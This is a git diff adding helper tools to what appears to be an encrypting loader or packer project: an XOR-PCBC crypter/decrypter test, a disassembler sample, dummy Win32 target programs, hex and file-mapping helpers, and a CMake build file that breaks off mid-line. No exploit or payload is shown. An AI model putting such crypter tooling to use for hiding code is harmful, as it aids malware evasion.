diff options
Diffstat (limited to 'source/tools')
42 files changed, 5122 insertions, 0 deletions
diff --git a/source/tools/decrypter.c b/source/tools/decrypter.c new file mode 100644 index 0000000..fcdbb72 --- /dev/null +++ b/source/tools/decrypter.c @@ -0,0 +1,116 @@ +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#ifdef __MINGW32__ +#include <windows.h> +#else +#define __cdecl +#include <string.h> +#endif + +#ifndef i386 +#error "decrypter does work with 32 bit compilation mode only at the moment" +#endif + +#include "crypt.h" +#include "helper.h" + + +/* see source/decrypter_x86.asm */ +__cdecl int decrypt_data(uint32_t* buf, uint32_t siz, uint32_t* iv, uint32_t* key, uint32_t ivkeysiz) __asm__("__decrypt_x86"); + + +int main(int argc, char** argv) +{ + bool verbose = false; + + if (argc != 2) { + fprintf(stderr, "usage: %s [TESTFILE]\n", argv[0]); + return -1; + } + + if (getenv("VERBOSE") != NULL) { + if (strcmp(getenv("VERBOSE"), "1") == 0) { + verbose = true; + } else { + fprintf(stderr, "%s: quiet mode, activate verbose mode with `export VERBOSE=1`\n", argv[0]); + } + } + + /* decrypter test */ + printf("Decrypter........: 0x%p\n", decrypt_data); + + size_t bufsiz = 0; + char* buf = mapfile(argv[1], &bufsiz); + if (!buf) { + return 1; + } + printf("buffer size......: 0x%p (%lu)\n", (void*)bufsiz, (long unsigned int)bufsiz); + + uint32_t iv[] = { xor32_randomkey(), xor32_randomkey(), xor32_randomkey(), xor32_randomkey(), xor32_randomkey() }; + uint32_t key[] = { xor32_randomkey(), xor32_randomkey(), xor32_randomkey(), xor32_randomkey(), xor32_randomkey() }; + size_t ivkeysiz = sizeof(iv)/sizeof(uint32_t); + + printf("\n---------- Crypter ----------\n"); + printf("plain buffer adr.: 0x%p\n", buf); + printf("iv adr...........: 0x%p\n", &iv[0]); + printf("key adr..........: 0x%p\n", &key[0]); + if (verbose) { + char* bufdata = bintostr(buf, bufsiz, 1, NULL); + printf("buffer...........: %s\n", bufdata); + free(bufdata); + } + char* ivdata = bintostr((char*)&iv[0] , sizeof(iv), 1, NULL); + char* keydata = bintostr((char*)&key[0], sizeof(key), 1, NULL); + printf("iv...............: %s\n", ivdata); + printf("key..............: %s\n", keydata); + + uint32_t* xorbuf = calloc( (bufsiz/sizeof(uint32_t)) + ivkeysiz, sizeof(uint32_t)); + memcpy((void*)xorbuf, buf, bufsiz); + uint32_t xorsiz = xor32n_pcbc_crypt_buf(xorbuf, bufsiz, &iv[0], &key[0], ivkeysiz); + printf("encryoted buf adr: 0x%p\n", xorbuf); + printf("encrypted size...: 0x%p (%lu)\n", (void*)xorsiz, (long unsigned int)xorsiz); + + char* plainbuf = calloc(xorsiz, sizeof(char)); + memcpy((void*)plainbuf, (void*)xorbuf, xorsiz); + xor32n_pcbc_crypt_buf((uint32_t*)plainbuf, xorsiz, &iv[0], &key[0], ivkeysiz); + + if (verbose) { + printf("xor32n_pcbc......: "); + char* xordata = bintostr((char*)xorbuf, xorsiz, 1, NULL); + printf("%s\n", xordata); + free(xordata); + + printf("plaintext........: "); + char* plaindata = bintostr((char*)plainbuf, bufsiz, 1, NULL); + printf("%s\n", plaindata); + free(plaindata); + } + + int retval = decrypt_data(xorbuf, xorsiz, &iv[0], &key[0], ivkeysiz); + printf("\n--------- Decrypter ---------\n"); + printf("retval...........: 0x%p (%d)\n", (void*)retval, retval); + if (verbose) { + printf("decrypted........: "); + char* decpdata = bintostr((char*)xorbuf, bufsiz, 1, NULL); + printf("%s\n", decpdata); + free(decpdata); + } + + if (memcmp(plainbuf, buf, bufsiz) != 0) { + fprintf(stderr, "%s: c decrypter failed to decrypt data correctly\n", argv[0]); + return 1; + } + if (memcmp(xorbuf, plainbuf, xorsiz) != 0) { + fprintf(stderr, "%s: asm decrypter failed to decrypt data correctly\n", argv[0]); + return 1; + } + fprintf(stderr, "\n%s: success\n", argv[0]); + + free(plainbuf); + free(xorbuf); + free(keydata); + free(ivdata); + + return 0; +} diff --git a/source/tools/disasm.c b/source/tools/disasm.c new file mode 100644 index 0000000..9e5489d --- /dev/null +++ b/source/tools/disasm.c @@ -0,0 +1,234 @@ +// diStorm64 library sample +// http://ragestorm.net/distorm/ +// Arkon, Stefan, 2005 +// Mikhail, 2006 +// JvW, 2007 + +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> +#include <string.h> +#include <inttypes.h> +#include <time.h> +#include <errno.h> +#include <sys/stat.h> + +// For the compilers who don't have sysexits.h, which is not an ISO/ANSI include! +#define EX_OK 0 +#define EX_USAGE 64 +#define EX_DATAERR 65 +#define EX_NOINPUT 66 +#define EX_NOUSER 67 +#define EX_NOHOST 68 +#define EX_UNAVAILABLE 69 +#define EX_SOFTWARE 70 +#define EX_OSERR 71 +#define EX_OSFILE 72 +#define EX_CANTCREAT 73 +#define EX_IOERR 74 +#define EX_TEMPFAIL 75 +#define EX_PROTOCOL 76 +#define EX_NOPERM 77 +#define EX_CONFIG 78 + +#include "distorm/distorm.h" +#include "distorm/mnemonics.h" +#include "disasm.h" + +// The number of the array of instructions the decoder function will use to return the disassembled instructions. +// Play with this value for performance... +#define MAX_INSTRUCTIONS (1000) + + +int main(int argc, char **argv) +{ + // Holds the result of the decoding. + _DecodeResult res; + // next is used for instruction's offset synchronization. + // decodedInstructionsCount holds the count of filled instructions' array by the decoder. + unsigned int decodedInstructionsCount = 0, i, next; + + // Default decoding mode is 32 bits, could be set by command line. + _DecodeType dt = Decode32Bits; + + // Default offset for buffer is 0, could be set in command line. + _OffsetType offset = 0; + char* errch = NULL; + + // Handling file. + FILE* f; + unsigned long filesize = 0, bytesread = 0; + unsigned long long bytesproc = 0, maxbytesproc = (unsigned long long)-1; + struct stat st; + + // Buffer to disassemble. + unsigned char *buf, *buf2; + + int opt, show_usage_and_die = 0, use_internal_decode = 0; + char *filename = NULL; + while ((opt = getopt(argc, argv, "b:f:m:ip:")) != -1) { + switch (opt) { + case 'b': + if (strncmp(optarg, "16", 2) == 0) { + dt = Decode16Bits; + } else if (strncmp(optarg, "32", 2) == 0) { + dt = Decode32Bits; + } else if (strncmp(optarg, "64", 2) == 0) { + dt = Decode64Bits; + } else { + show_usage_and_die = 1; + } + break; + case 'f': + filename = strdup(optarg); + break; + case 'm': +#ifdef SUPPORT_64BIT_OFFSET + offset = strtoull(optarg, &errch, 16); +#else + offset = strtoul(optarg, &errch, 16); +#endif + break; + case 'i': + use_internal_decode = 1; + break; + case 'p': + maxbytesproc = strtoull(optarg, &errch, 16); + break; + } + } + + // Check params. + if (show_usage_and_die || !filename) { + printf("Usage: %s -i -b[16|32|64] -f[filename] -m[memory offset] -p[memory size]\r\n\tRaw disassembler output.\r\n\tMemory offset is origin of binary file in memory (address in hex).\r\n\tDefault decoding mode is -b32.\r\n\texample: %s -b16 demo.com 789a\r\n\tUse internal decoding with -i\r\n", argv[0], argv[0]); + return EX_USAGE; + } + + f = fopen(filename, "rb"); + if (f == NULL) { + perror("fopen"); + return EX_NOINPUT; + } + + if (fstat(fileno(f), &st) != 0) { + perror("fstat"); + fclose(f); + return EX_NOINPUT; + } + filesize = st.st_size; + + // We read the whole file into memory in order to make life easier, + // otherwise we would have to synchronize the code buffer as well (so instructions won't be split). + buf2 = buf = malloc(filesize); + if (buf == NULL) { + perror("File too large."); + fclose(f); + return EX_UNAVAILABLE; + } + bytesread = fread(buf, 1, filesize, f); + if (bytesread != filesize) { + perror("Can't read file into memory."); + free(buf); + fclose(f); + return EX_IOERR; + } + + fclose(f); + + buf += offset; + filesize -= offset; + + printf("bits: %d\nfilename:%s\norigin: ", dt == Decode16Bits ? 16 : dt == Decode32Bits ? 32 : 64, filename); +#ifdef SUPPORT_64BIT_OFFSET + if (dt != Decode64Bits) printf("%" PRIx64 "\n", offset); + else printf("%" PRIx64 "\n", offset); +#else + printf("%08x\n", offset); +#endif + printf("size: %" PRIx64 "\n", maxbytesproc); + + if (use_internal_decode) { + _DInst instData[MAX_INSTRUCTIONS]; + while (1) { + res = disasm(offset, (const unsigned char*)buf, filesize, dt, instData, MAX_INSTRUCTIONS, &decodedInstructionsCount); + for (i = 0; i < decodedInstructionsCount; i++) { +#ifdef SUPPORT_64BIT_OFFSET + printf("%" PRIx64 " (%" PRIu32 ") %04" PRIx16, (uint64_t)instData[i].addr, instData[i].size, instData[i].opcode); +#else + printf("%08x (%02d) %04" PRIx16, instData[i].addr, instData[i].size, instData[i].opcode); +#endif + _InstructionType optype = instData[i].opcode; + switch (optype) { + case I_DEC: printf("\tDEC"); break; + case I_INC: printf("\tINC"); break; + case I_ADD: printf("\tADD"); break; + case I_SUB: printf("\tSUB"); break; + case I_MOV: printf("\tMOV"); break; + case I_PUSH: printf("\tPUSH"); break; + case I_POP: printf("\tPOP"); break; + case I_NOP: printf("\tNOP"); break; + case I_JMP: printf("\tJMP"); break; + case I_JMP_FAR: printf("\tJMP FAR"); break; + case I_CALL: printf("\tCALL"); break; + case I_CALL_FAR: printf("\tCALL FAR"); break; + case I_RET: printf("\tRET"); break; + } + printf("\r\n"); + bytesproc += instData[i].size; + if (bytesproc >= maxbytesproc) break; + } + + if (res == DECRES_SUCCESS) break; + else if (decodedInstructionsCount == 0) break; + if (bytesproc >= maxbytesproc) break; + next = (unsigned int)(instData[decodedInstructionsCount-1].addr - offset); + next += instData[decodedInstructionsCount-1].size; + buf += next; + filesize -= next; + offset += next; + } + } else { + // Decoded instruction information. + _DecodedInst decodedInstructions[MAX_INSTRUCTIONS]; + // Decode the buffer at given offset (virtual address). + while (1) { + // If you get an undefined reference linker error for the following line, + // change the SUPPORT_64BIT_OFFSET in distorm.h. + res = distorm_decode(offset, (const unsigned char*)buf, filesize, dt, decodedInstructions, MAX_INSTRUCTIONS, &decodedInstructionsCount); + if (res == DECRES_INPUTERR) { + // Null buffer? Decode type not 16/32/64? + fputs("Input error, halting!\n", stderr); + free(buf2); + return EX_SOFTWARE; + } + + for (i = 0; i < decodedInstructionsCount; i++) { +#ifdef SUPPORT_64BIT_OFFSET + printf("%" PRIx64 " (%" PRIu64 ") %-24s %s%s%s\r\n", decodedInstructions[i].offset, (long long unsigned int)decodedInstructions[i].size, (char*)decodedInstructions[i].instructionHex.p, (char*)decodedInstructions[i].mnemonic.p, decodedInstructions[i].operands.length != 0 ? " " : "", (char*)decodedInstructions[i].operands.p); +#else + printf("%08x (%02d) %-24s %s%s%s\r\n", decodedInstructions[i].offset, decodedInstructions[i].size, (char*)decodedInstructions[i].instructionHex.p, (char*)decodedInstructions[i].mnemonic.p, decodedInstructions[i].operands.length != 0 ? " " : "", (char*)decodedInstructions[i].operands.p); +#endif + bytesproc += decodedInstructions[i].size; + if (bytesproc >= maxbytesproc) break; + } + + if (res == DECRES_SUCCESS) break; // All instructions were decoded. + else if (decodedInstructionsCount == 0) break; + if (bytesproc >= maxbytesproc) break; + + // Synchronize: + next = (unsigned int)(decodedInstructions[decodedInstructionsCount-1].offset - offset); + next += decodedInstructions[decodedInstructionsCount-1].size; + // Advance ptr and recalc offset. + buf += next; + filesize -= next; + offset += next; + } + } + + free(filename); + // Release buffer + free(buf2); + + return EX_OK; +} diff --git a/source/tools/dummy.c b/source/tools/dummy.c new file mode 100644 index 0000000..d7623da --- /dev/null +++ b/source/tools/dummy.c @@ -0,0 +1,34 @@ +#include <windows.h> + +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> + + +int subroutine(void* ptr, int d) +{ + return (int)ptr+d+1; +} + +int main(int argc, char** argv) +{ + DWORD dwWait = 2; + + if (argc > 1 && argc != 2) { + printf("usage: %s [WAIT_TIME]\n", argv[0]); + abort(); + } else if (argc == 2) { + errno = 0; + dwWait = strtoul(argv[1], NULL, 10); + if (errno != 0) + dwWait = 2; + } + + printf("%s", "Hi, I'm a useless dummy like the guy who coded me.\n"); + printf("Waiting %lu seconds ..\n", dwWait); + sleep(dwWait); + printf("%s", "Dummy done.\n"); + if (subroutine(NULL, 1) == 2) { + return 0; + } else return 1; +} diff --git a/source/tools/dummy_gui/callbacks.c b/source/tools/dummy_gui/callbacks.c new file mode 100644 index 0000000..3bc40fd --- /dev/null +++ b/source/tools/dummy_gui/callbacks.c @@ -0,0 +1,94 @@ +#include "callbacks.h" +#include "resource.h" + +// Window procedure for our main window. +LRESULT CALLBACK MainWndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam) +{ + static HINSTANCE hInstance; + + switch (msg) + { + case WM_COMMAND: + { + switch (LOWORD(wParam)) + { + case ID_HELP_ABOUT: + { + DialogBox(hInstance, MAKEINTRESOURCE(IDD_ABOUTDIALOG), hWnd, &AboutDialogProc); + return 0; + } + + case ID_FILE_EXIT: + { + DestroyWindow(hWnd); + return 0; + } + } + break; + } + + case WM_GETMINMAXINFO: + { + MINMAXINFO *minMax = (MINMAXINFO*) lParam; + minMax->ptMinTrackSize.x = 220; + minMax->ptMinTrackSize.y = 110; + + return 0; + } + + case WM_SYSCOMMAND: + { + switch (LOWORD(wParam)) + { + case ID_HELP_ABOUT: + { + DialogBox(hInstance, MAKEINTRESOURCE(IDD_ABOUTDIALOG), hWnd, &AboutDialogProc); + return 0; + } + } + break; + } + + case WM_CREATE: + { + hInstance = ((LPCREATESTRUCT) lParam)->hInstance; + return 0; + } + + case WM_DESTROY: + { + PostQuitMessage(0); + return 0; + } + } + + return DefWindowProc(hWnd, msg, wParam, lParam); +} + + +// Dialog procedure for our "about" dialog. +INT_PTR CALLBACK AboutDialogProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam) +{ + (void)lParam; + switch (uMsg) + { + case WM_COMMAND: + { + switch (LOWORD(wParam)) + { + case IDOK: + case IDCANCEL: + { + EndDialog(hwndDlg, (INT_PTR) LOWORD(wParam)); + return (INT_PTR) TRUE; + } + } + break; + } + + case WM_INITDIALOG: + return (INT_PTR) TRUE; + } + + return (INT_PTR) FALSE; +} diff --git a/source/tools/dummy_gui/callbacks.h b/source/tools/dummy_gui/callbacks.h new file mode 100644 index 0000000..7cc79c5 --- /dev/null +++ b/source/tools/dummy_gui/callbacks.h @@ -0,0 +1,12 @@ +#ifndef CALLBACKS_H +#define CALLBACKS_H + +#include <windows.h> + +// Window procedure for our main window. +LRESULT CALLBACK MainWndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam); + +// Dialog procedure for our "about" dialog. +INT_PTR CALLBACK AboutDialogProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam); + +#endif diff --git a/source/tools/dummy_gui/res/Application.ico b/source/tools/dummy_gui/res/Application.ico Binary files differnew file mode 100644 index 0000000..d551aa3 --- /dev/null +++ b/source/tools/dummy_gui/res/Application.ico diff --git a/source/tools/dummy_gui/res/Application.manifest b/source/tools/dummy_gui/res/Application.manifest new file mode 100644 index 0000000..d984135 --- /dev/null +++ b/source/tools/dummy_gui/res/Application.manifest @@ -0,0 +1,16 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> + +<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> + <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> + <security> + <requestedPrivileges> + <requestedExecutionLevel level="asInvoker" uiAccess="false"/> + </requestedPrivileges> + </security> + </trustInfo> + <dependency> + <dependentAssembly> + <assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"/> + </dependentAssembly> + </dependency> +</assembly>
\ No newline at end of file diff --git a/source/tools/dummy_gui/res/resource.rc b/source/tools/dummy_gui/res/resource.rc new file mode 100644 index 0000000..489dd7a --- /dev/null +++ b/source/tools/dummy_gui/res/resource.rc @@ -0,0 +1,73 @@ +#include <windows.h> +#include "resource.h" + +// Win32 application icon. +IDI_APPICON ICON "Application.ico" + +// Our main menu. +IDR_MAINMENU MENU +BEGIN + POPUP "&File" + BEGIN + MENUITEM "E&xit", ID_FILE_EXIT + END + POPUP "&Help" + BEGIN + MENUITEM "&About", ID_HELP_ABOUT + END +END + +// Application manifest. +CREATEPROCESS_MANIFEST_RESOURCE_ID RT_MANIFEST "Application.manifest" + +// Executable version information. +VS_VERSION_INFO VERSIONINFO +FILEVERSION 1,0,0,0 +PRODUCTVERSION 1,0,0,0 +FILEFLAGSMASK VS_FFI_FILEFLAGSMASK +#ifdef _DEBUG + FILEFLAGS VS_FF_DEBUG | VS_FF_PRERELEASE +#else + FILEFLAGS 0 +#endif +FILEOS VOS_NT_WINDOWS32 +FILETYPE VFT_APP +FILESUBTYPE VFT2_UNKNOWN +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "080904b0" + BEGIN + VALUE "CompanyName", "Transmission Zero" + VALUE "FileDescription", "Win32 Test application" + VALUE "FileVersion", "1.0.0.0" + VALUE "InternalName", "Win32App" + VALUE "LegalCopyright", "©2013 Transmission Zero" + VALUE "OriginalFilename", "Win32App.exe" + VALUE "ProductName", "Win32 Test application" + VALUE "ProductVersion", "1.0.0.0" + END + END + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x809, 1200 + END +END + +// Our "about" dialog. +IDD_ABOUTDIALOG DIALOGEX 0, 0, 147, 67 +STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU +CAPTION "About" +FONT 8, "MS Shell Dlg", 400, 0, 0x1 +BEGIN + ICON IDI_APPICON,IDC_STATIC,7,7,20,20 + LTEXT "Win32 Test application.",IDC_STATIC,34,7,86,8 + LTEXT "©2013 Transmission Zero",IDC_STATIC,34,17,86,8 + DEFPUSHBUTTON "OK",IDOK,90,46,50,14,WS_GROUP +END + +// Our accelerators. +IDR_ACCELERATOR ACCELERATORS +BEGIN + "A", ID_HELP_ABOUT, VIRTKEY, ALT, NOINVERT +END diff --git a/source/tools/dummy_gui/resource.h b/source/tools/dummy_gui/resource.h new file mode 100644 index 0000000..ccda0e7 --- /dev/null +++ b/source/tools/dummy_gui/resource.h @@ -0,0 +1,10 @@ +#define IDI_APPICON 101 +#define IDR_MAINMENU 102 +#define IDR_ACCELERATOR 103 +#define IDD_ABOUTDIALOG 104 +#define ID_FILE_EXIT 40001 +#define ID_HELP_ABOUT 40002 + +#ifndef IDC_STATIC + #define IDC_STATIC -1 +#endif diff --git a/source/tools/dummy_gui/winmain.c b/source/tools/dummy_gui/winmain.c new file mode 100644 index 0000000..e2de4ac --- /dev/null +++ b/source/tools/dummy_gui/winmain.c @@ -0,0 +1,83 @@ +#include <windows.h> +#include <commctrl.h> +#include "resource.h" +#include "callbacks.h" + +// Our application entry point. +int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) +{ + INITCOMMONCONTROLSEX icc; + WNDCLASSEX wc; + LPCTSTR MainWndClass = TEXT("Win32 Test application"); + HWND hWnd; + HACCEL hAccelerators; + HMENU hSysMenu; + MSG msg; + + (void)hPrevInstance; + (void)lpCmdLine; + + // Initialise common controls. + icc.dwSize = sizeof(icc); + icc.dwICC = ICC_WIN95_CLASSES; + InitCommonControlsEx(&icc); + + // Class for our main window. + wc.cbSize = sizeof(wc); + wc.style = 0; + wc.lpfnWndProc = &MainWndProc; + wc.cbClsExtra = 0; + wc.cbWndExtra = 0; + wc.hInstance = hInstance; + wc.hIcon = (HICON) LoadImage(hInstance, MAKEINTRESOURCE(IDI_APPICON), IMAGE_ICON, 0, 0, + LR_DEFAULTSIZE | LR_DEFAULTCOLOR | LR_SHARED); + wc.hCursor = (HCURSOR) LoadImage(NULL, IDC_ARROW, IMAGE_CURSOR, 0, 0, LR_SHARED); + wc.hbrBackground = (HBRUSH) (COLOR_BTNFACE + 1); + wc.lpszMenuName = MAKEINTRESOURCE(IDR_MAINMENU); + wc.lpszClassName = MainWndClass; + wc.hIconSm = (HICON) LoadImage(hInstance, MAKEINTRESOURCE(IDI_APPICON), IMAGE_ICON, + GetSystemMetrics(SM_CXSMICON), GetSystemMetrics(SM_CYSMICON), + LR_DEFAULTCOLOR | LR_SHARED); + + // Register our window classes, or error. + if (! RegisterClassEx(&wc)) + { + MessageBox(NULL, TEXT("Error registering window class."), TEXT("Error"), MB_ICONERROR | MB_OK); + return 0; + } + + // Create instance of main window. + hWnd = CreateWindowEx(0, MainWndClass, MainWndClass, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, + 320, 200, NULL, NULL, hInstance, NULL); + + // Error if window creation failed. + if (! hWnd) + { + MessageBox(NULL, TEXT("Error creating main window."), TEXT("Error"), MB_ICONERROR | MB_OK); + return 0; + } + + // Load accelerators. + hAccelerators = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDR_ACCELERATOR)); + + // Add "about" to the system menu. + hSysMenu = GetSystemMenu(hWnd, FALSE); + InsertMenu(hSysMenu, 5, MF_BYPOSITION | MF_SEPARATOR, 0, NULL); + InsertMenu(hSysMenu, 6, MF_BYPOSITION, ID_HELP_ABOUT, TEXT("About")); + + // Show window and force a paint. + ShowWindow(hWnd, nCmdShow); + UpdateWindow(hWnd); + + // Main message loop. + while(GetMessage(&msg, NULL, 0, 0) > 0) + { + if (! TranslateAccelerator(msg.hwnd, hAccelerators, &msg)) + { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + } + + return (int) msg.wParam; +} diff --git a/source/tools/helper.c b/source/tools/helper.c new file mode 100644 index 0000000..a27da7e --- /dev/null +++ b/source/tools/helper.c @@ -0,0 +1,150 @@ +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> +#include <stdint.h> +#include <stdbool.h> +#include <fcntl.h> +#include <string.h> + +#include <sys/stat.h> + +#ifdef __MINGW32__ +#include <windows.h> +#else +#include <sys/mman.h> /* mmap - not available on windoze */ +#endif + +#include "helper.h" + +#ifdef _USE_PYTHON +#undef _POSIX_C_SOURCE +#undef _XOPEN_SOURCE +#include <Python.h> +#endif + + +static const char hextable[] = "0123456789ABCDEF"; + + +#ifdef _USE_PYTHON +void* MyPyMem_Calloc(size_t n, size_t s) +{ + void* ptr = PyMem_Malloc(n*s); + if (ptr) + memset(ptr, '\0', n*s); + return ptr; +} +#endif + +char* mapfile(const char* path, size_t* mapsizptr) +{ + /* TODO: MINGW alternative should to exactly the same as the linux one! (map file to memory without duplicating the mmap's buffer) */ +#ifdef __MINGW32__ + HANDLE hfile = CreateFile(path, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hfile == INVALID_HANDLE_VALUE) + return NULL; + if (SetFilePointer(hfile, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER) + return NULL; + *mapsizptr = GetFileSize(hfile, NULL); + if (*mapsizptr == INVALID_FILE_SIZE) + return NULL; + char* buf = calloc(*mapsizptr, sizeof(char)); + DWORD szread = 0; + if (!buf) + return NULL; + if (ReadFile(hfile, buf, *mapsizptr, &szread, NULL) != TRUE) { + free(buf); + return NULL; + } + CloseHandle(hfile); + return buf; +#else + int fd = open(path, O_RDWR); + if (fd == -1) + return NULL; + struct stat sb; + if (fstat(fd, &sb) == -1) + return NULL; + char* mapd = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); + if (mapd == MAP_FAILED) + return NULL; + *mapsizptr = sb.st_size; + close(fd); + return mapd; +#endif +} + +ssize_t writebuf(const char* path, unsigned char* buf, size_t siz) +{ + int ffd = open(path, O_WRONLY | O_CREAT | O_TRUNC, + S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); + ssize_t wrt = write(ffd, buf, siz); + close(ffd); + return wrt; +} + +char* bintostr(const char* buf, size_t siz, size_t delim, size_t *strlenptr) +{ + register size_t i; + size_t allocLen = ( delim > 0 ? (int)(siz/delim) : 1 ) + siz*2; + char* result = calloc(allocLen+1, sizeof(char)); + char tmp[4]; + + tmp[3] = '\0'; + for (i = 0; i < siz; ++i) { + register unsigned char halfByte = buf[i] >> 4; + tmp[0] = hextable[halfByte%16]; + halfByte = buf[i] & 0x0F; + tmp[1] = hextable[halfByte%16]; + tmp[2] = '\0'; + if (delim>0 && i%delim==delim-1) + tmp[2] = ' '; + strcat(result, tmp); + } + result[allocLen] = '\0'; + if (strlenptr) { + *strlenptr = allocLen; + } + return result; +} + +void printrimmed(char* str, size_t siz, size_t charsperline, bool printlinenmb) +{ + if (charsperline == 0) { + printf("%s\n", str); + } else { + unsigned long ln = 0; + for (size_t i = 0; i < siz; i+=charsperline) { + if (printlinenmb) { + printf("%04lu: ", ln++); + } + size_t psiz = (i+1 < siz-charsperline ? charsperline : siz-i); + printf("%.*s\n", (int)psiz, (str + i)); + } + } +} + +void printbytebuf(char* buf, size_t siz, size_t charsperline, bool printlinenmb) +{ + size_t hexlen = 0; + char* hexbuf = bintostr(buf, siz, 1, &hexlen); + printrimmed(hexbuf, hexlen, charsperline, printlinenmb); + free(hexbuf); +} + +char *strnstr(const char *haystack, const char *needle, size_t len) +{ + int i; + size_t needle_len; + + if (0 == (needle_len = strnlen(needle, len))) + return (char *)haystack; + + for (i=0; i<=(int)(len-needle_len); i++) { + if ((haystack[0] == needle[0]) && + (0 == strncmp(haystack, needle, needle_len))) + return (char *)haystack; + haystack++; + } + return NULL; +} diff --git a/source/tools/helper.h b/source/tools/helper.h new file mode 100644 index 0000000..cc5e75b --- /dev/null +++ b/source/tools/helper.h @@ -0,0 +1,37 @@ +#ifndef HELPER_H_INCLUDED +#define HELPER_H_INCLUDED + +#include <stdbool.h> +#include <stdlib.h> + +#ifdef _USE_PYTHON +/* Python header files redefine some macros */ +#undef _POSIX_C_SOURCE +#undef _XOPEN_SOURCE +#include <Python.h> /* obligatory */ + +#undef calloc +#undef malloc +#undef realloc +#undef free +#define calloc MyPyMem_Calloc +#define malloc PyMem_Malloc +#define realloc PyMem_Realloc +#define free PyMem_Free +void* MyPyMem_Calloc(size_t n, size_t s); +#endif /* _USE_PYTHON */ + + +char* mapfile(const char* path, size_t* mapsizptr); + +ssize_t writebuf(const char* path, unsigned char* buf, size_t siz); + +char* bintostr(const char* buf, size_t siz, size_t delim, size_t *strlenptr); + +void printrimmed(char* str, size_t siz, size_t charsperline, bool printlinenmb); + +void printbytebuf(char* buf, size_t siz, size_t charsperline, bool printlinenmb); + +char *strnstr(const char *haystack, const char *needle, size_t len); + +#endif diff --git a/source/tools/host/CMakeLists.txt b/source/tools/host/CMakeLists.txt new file mode 100644 index 0000000..4acadcc --- /dev/null +++ b/source/tools/host/CMakeLists.txt @@ -0,0 +1,106 @@ +cmake_minimum_required(VERSION 2.8) +set(SYSROOT_DIR ../../../deps/sysroot/bin) +set(TOOLCHAIN_PREFIX ${CMAKE_SOURCE_DIR}/${SYSROOT_DIR}) +set(CMAKE_C_COMPILER ${TOOLCHAIN_PREFIX}/gcc) +set(CMAKE_LINKER ${TOOLCHAIN_PREFIX}/ld) +set(CMAKE_CXX_COMPILER false) +set(CMAKE_CXX_LINK_EXECUTABLE false) +set(CMAKE_RC_COMPILER_INIT false) +project(host-tools C) +set(CMAKE_VERBOSE_MAKEFILE ON) +set(CMAKE_RULE_MESSAGES OFF) + +set(CMAKE_C_FLAGS "-Wall -std=gnu99 -g -D_GNU_SOURCE=1 -D_NO_COMPAT=1 -D_NO_UTILS=1 -D_HOST_TOOLS=1") + +set(MILLER_DEFAULT_SRCDIR ${CMAKE_SOURCE_DIR}/../.. CACHE INTERNAL "" FORCE) +set(MILLER_DEFAULT_HDRDIR ${CMAKE_SOURCE_DIR}/../../../include CACHE INTERNAL "" FORCE) +set(MILLER_DEFAULT_TOOLSDIR ${CMAKE_SOURCE_DIR}/.. CACHE INTERNAL "" FORCE) + +message(STATUS "CMAKE_C_COMPILER: ${CMAKE_C_COMPILER}") +message(STATUS "CMAKE_LINKER: ${CMAKE_LINKER}") +message(STATUS "CMAKE_C_LINK_EXECUTABLE: ${CMAKE_C_LINK_EXECUTABLE}") + +if (NOT MILLER_SRCDIR) + message(AUTHOR_WARNING "MILLER_SRCDIR: missing, using default ${MILLER_DEFAULT_SRCDIR}") + set(MILLER_SRCDIR ${MILLER_DEFAULT_SRCDIR}) +else() + message(STATUS "MILLER_SRCDIR: ${MILLER_SRCDIR}") +endif() + +if (NOT MILLER_TOOLSDIR) + message(AUTHOR_WARNING "MILLER_TOOLSDIR: missing") + set(MILLER_TOOLSDIR ${MILLER_DEFAULT_TOOLSDIR}) +else() + message(STATUS "MILLER_TOOLSDIR: ${MILLER_TOOLSDIR}") +endif() + +if (NOT MILLER_HDRDIR) + message(AUTHOR_WARNING "MILLER_HDRDIR: missing") + set(MILLER_HDRDIR ${MILLER_DEFAULT_HDRDIR}) +else() + message(STATUS "MILLER_HDRDIR: ${MILLER_HDRDIR}") +endif() + +if (NOT MILLER_HDRDIR_CREATED) + message(FATAL_ERROR "MILLER_HDRDIR_CREATED: missing") +endif() + +if (NOT LOADER_ENDMARKER) + message(FATAL_ERROR "LOADER_ENDMARKER: missing") +else() + message(STATUS "LOADER_ENDMARKER: ${LOADER_ENDMARKER}") +endif() + +if (NOT PYTHON_INCDIR) + message(FATAL_ERROR "PYTHON_INCDIR: missing") +else() + message(STATUS "PYTHON_INCDIR: ${PYTHON_INCDIR}") +endif() + +message(STATUS "INSTALL_DEST: ${INSTALL_DEST}") + + +set(CRYPT_SRC ${MILLER_SRCDIR}/aes.c ${MILLER_SRCDIR}/crypt.c ${MILLER_SRCDIR}/utils.c hdr_crypt.c) +set(STRINGS_SRC ${MILLER_SRCDIR}/crypt_strings.c ${MILLER_SRCDIR}/crypt.c ${MILLER_SRCDIR}/utils.c ${MILLER_TOOLSDIR}/helper.c) + + +add_executable(hdr_crypt-host ${CRYPT_SRC}) +target_include_directories(hdr_crypt-host PRIVATE 